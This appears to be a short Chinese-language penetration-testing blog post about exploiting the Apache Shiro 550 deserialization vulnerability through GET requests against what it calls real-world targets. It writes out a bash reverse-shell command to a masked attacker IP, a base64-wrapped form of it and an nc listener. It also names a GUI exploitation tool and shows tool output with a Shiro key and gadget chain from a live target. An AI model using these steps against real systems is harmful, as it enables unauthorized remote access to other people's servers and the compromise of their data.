分享了Shiro550-POST型漏洞利用技巧,分享下get型实战技巧
常见条件
一般shiro550的get型隐患点不固定,如非登录口,伪静态页面可能都存在。简单经验归纳为靠近登录口的页面点和目标主站页面有可能存在
工具:飞鸿shiro检测v2.1
Shiro的利用不仅post数据包可以使用,get请求同样可以。使用界面工具可以看到返回特点:
代码语言:javascript复制认证不成功(账号密码错误),返回包会返回deleteMe=
认证成功(账号密码错误),返回包会返回rememberMe=Shiro漏洞点:http://XXX.XXX.XXX.XXX/r/sellerSign.html?storeType=1
Bash编码网站http://www.jackson-t.ca/runtime-exec-payloads.html,
因为目标是linux系统,因此使用bash将其shell反弹过来:
将
代码语言:javascript复制bash -i >& /dev/tcp/XXX.XXX.XXX.XXX/9999 0>&1使用bash加密为
代码语言:javascript复制bash -c {echo,XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX=}|{base64,-d}|{bash,-i}
攻击机开启nc监听
代码语言:javascript复制nc -lvvp 9999 //端口进行监听
成功反弹shell
V2.2版本飞鸿工具直接getshell
https://github.com/feihong-cs/ShiroExploit/releases
某实战目标:
http://XXX.XXX.XXX.XXX:88/tenement/a/login
[*] Using Key kPH bIxk5D2deZiIxcaaaA==
[*] Using Gadget CommonsBeanutils1经过确认,这个实战目标Shell是通过反弹回不来的,需要通过带外攻击OOB截取返回包获取shell,下篇分享OOB
